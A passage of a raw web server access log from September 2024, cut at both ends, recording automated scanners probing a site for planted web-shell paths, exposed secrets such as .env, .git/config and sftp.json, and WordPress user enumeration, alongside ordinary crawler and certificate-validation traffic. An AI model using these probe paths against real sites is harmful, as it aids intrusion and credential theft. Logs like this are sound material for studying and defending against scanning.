AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:14 +0700] "GET /css/colors/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:15 +0700] "GET /network/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:15 +0700] "GET /maint/images.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:15 +0700] "GET /themes/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:15 +0700] "GET /css/colors/coffee/wp-casper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:14:15 +0700] "GET /111.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:16 +0700] "GET /a2t1lr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:16 +0700] "GET /css/colors/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:16 +0700] "GET /sodium_compat/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:14:16 +0700] "GET /cl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:17 +0700] "GET /phpmailer/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:14:17 +0700] "GET /Text/Diff/Renderer/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:14:17 +0700] "GET /tclu0b.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 51.15.16.101 - - [16/Sep/2024:17:05:38 +0700] "GET /inputs.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.15.16.101 - - [16/Sep/2024:17:06:00 +0700] "GET /wp-admin/inputs.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.242.163 - - [16/Sep/2024:21:03:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 23.178.112.219 - - [18/Sep/2024:10:17:37 +0700] "GET /.well-known/acme-challenge/RWmL-heqXofu9m9q47l5JHOiaRj-HMUyLqwsrr0pxiA HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 47.129.98.50 - - [18/Sep/2024:10:17:39 +0700] "GET /.well-known/acme-challenge/RWmL-heqXofu9m9q47l5JHOiaRj-HMUyLqwsrr0pxiA HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 34.217.113.97 - - [18/Sep/2024:10:17:39 +0700] "GET /.well-known/acme-challenge/RWmL-heqXofu9m9q47l5JHOiaRj-HMUyLqwsrr0pxiA HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 13.60.189.223 - - [18/Sep/2024:10:17:39 +0700] "GET /.well-known/acme-challenge/RWmL-heqXofu9m9q47l5JHOiaRj-HMUyLqwsrr0pxiA HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.137.175.210 - - [18/Sep/2024:10:17:40 +0700] "GET /.well-known/acme-challenge/RWmL-heqXofu9m9q47l5JHOiaRj-HMUyLqwsrr0pxiA HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 207.241.235.133 - - [18/Sep/2024:10:17:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/cfa2980 warc/v0.8.47" 207.241.225.134 - - [18/Sep/2024:10:17:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/6d512bb warc/v0.8.47" 207.241.225.114 - - [18/Sep/2024:10:17:59 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/cfa2980 warc/v0.8.47" 68.183.9.16 - - [18/Sep/2024:10:18:04 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 68.183.9.16 - - [18/Sep/2024:10:18:04 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084438) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 68.183.9.16 - - [18/Sep/2024:10:18:04 +0700] "GET /server HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:05 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:05 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:05 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:06 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:06 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:06 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:07 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:07 +0700] "GET /_all_dbs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (l9scan/2.0.633323e223e2335313e2330313; +https://leakix.net)" 68.183.9.16 - - [18/Sep/2024:10:18:07 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:08 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:08 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:08 +0700] "GET /s/633323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:09 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:09 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.183.9.16 - - [18/Sep/2024:10:18:10 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 104.197.69.115 - - [18/Sep/2024:10:19:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36" 205.169.39.252 - - [18/Sep/2024:10:19:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 151.115.77.26 - - [18/Sep/2024:10:19:14 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 205.169.39.252 - - [18/Sep/2024:10:19:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 84.17.42.12 - - [18/Sep/2024:12:13:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36" 151.80.148.159 - - [18/Sep/2024:12:13:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36" 197.242.159.250 - - [18/Sep/2024:12:13:41 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 77.221.152.105 - - [18/Sep/2024:12:14:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 205.169.39.23 - - [18/Sep/2024:14:10:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 34.123.170.104 - - [18/Sep/2024:14:13:14 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 165.22.110.5 - - [18/Sep/2024:15:15:17 +0700] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)" 165.22.110.5 - - [18/Sep/2024:15:15:17 +0700] "GET /wordpress/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)" 157.245.144.213 - - [18/Sep/2024:17:58:34 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 104.154.217.219 - - [19/Sep/2024:06:42:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 51.15.16.101 - - [19/Sep/2024:13:22:42 +0700] "GET /wp-apxupx.php?apx=upx HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.214.65.46 - - [19/Sep/2024:15:10:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 147.182.191.216 - - [20/Sep/2024:01:14:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 212.237.125.44 - - [20/Sep/2024:09:31:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 212.237.125.44 - - [20/Sep/2024:11:02:04 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 51.15.16.101 - - [20/Sep/2024:12:12:54 +0700] "GET /wp-apxupx.php?apx=upx HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 54.88.179.33 - - [20/Sep/2024:15:18:24 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 104.152.52.68 - - [20/Sep/2024:17:47:43 +0700] "GET / HTTP/1.1" 301 162 "-" "curl/7.61.1" 128.199.199.29 - - [21/Sep/2024:03:00:50 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 92.205.182.254 - - [21/Sep/2024:17:11:10 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 92.205.182.254 - - [21/Sep/2024:17:11:16 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 92.205.182.254 - - [21/Sep/2024:17:11:18 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 51.15.16.101 - - [21/Sep/2024:18:27:55 +0700] "POST /ss.php HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 212.103.60.10 - - [21/Sep/2024:19:06:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 209.38.225.218 - - [22/Sep/2024:02:11:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:46 +0700] "GET /images/neko.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:43:47 +0700] "GET /wp-admin/includes/class-custom-header.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:43:47 +0700] "GET /wp-includes/wp-includes_function.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 192.145.125.92 - - [23/Sep/2024:02:43:47 +0700] "GET /wp-includes/option-module.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:48 +0700] "GET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:48 +0700] "GET /wp-content/plugins/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 192.145.125.92 - - [23/Sep/2024:02:43:49 +0700] "GET /customize/atomlib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:43:49 +0700] "GET /js/tinymce/plugins/compat3x/css/wp-casper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:50 +0700] "GET /maint/shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:43:50 +0700] "GET /class-wp-recovery-mode-email-service-meta.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:50 +0700] "GET /js/tinymce/skins/lightgray/img/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 192.145.125.92 - - [23/Sep/2024:02:43:51 +0700] "GET /js/plupload/moderation.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:51 +0700] "GET /index2313.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:43:52 +0700] "GET /plugins/ern/gawean.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:52 +0700] "GET /maint/aj.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:43:53 +0700] "GET /themes/pridmag/1.php?u HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 192.145.125.92 - - [23/Sep/2024:02:43:53 +0700] "GET /settings.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 192.145.125.92 - - [23/Sep/2024:02:43:54 +0700] "GET /authorize.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:54 +0700] "GET /user/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:43:55 +0700] "GET /l/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:55 +0700] "GET /css/colors/blue/aclass.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:55 +0700] "GET /offercodes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 192.145.125.92 - - [23/Sep/2024:02:43:56 +0700] "GET /themes/finley/min.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:56 +0700] "GET /uploads/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:56 +0700] "GET /css/colors/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:43:57 +0700] "GET /digital-download/new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:43:57 +0700] "GET /ID3/getid.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:43:57 +0700] "GET /includes/class_api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:43:58 +0700] "GET /phpunit/phpunit/src/Util/PHP/MARIJUANA.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:58 +0700] "GET /plugins/upspy/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:59 +0700] "GET /uploads/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:43:59 +0700] "GET /plugins/apikey/wp-config-samples.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:44:00 +0700] "GET /themes/twentynineteen/inc/ty.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:44:00 +0700] "GET /js/tinymce/themes/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:00 +0700] "GET /includes/continents-cities-decryption.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:01 +0700] "GET /plugins/x/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 192.145.125.92 - - [23/Sep/2024:02:44:01 +0700] "GET /images/bless.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:02 +0700] "GET /customize/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:02 +0700] "GET /plugins/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:03 +0700] "GET /codeboy1877_up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:44:03 +0700] "GET /plugins/seox/wsoyanzf.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:03 +0700] "GET /class-wp-widget-private.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:04 +0700] "GET /source.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:04 +0700] "GET /ID3/lmfi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:05 +0700] "GET /acme-challenge/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:05 +0700] "GET /css/colors/blue/cloud.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 192.145.125.92 - - [23/Sep/2024:02:44:06 +0700] "GET /pomo/v2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 192.145.125.92 - - [23/Sep/2024:02:44:06 +0700] "GET /SimplePie/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:07 +0700] "GET /allez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:07 +0700] "GET /images/searchl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:08 +0700] "GET /languages/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:08 +0700] "GET /com_jea/views/form/tmpl/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 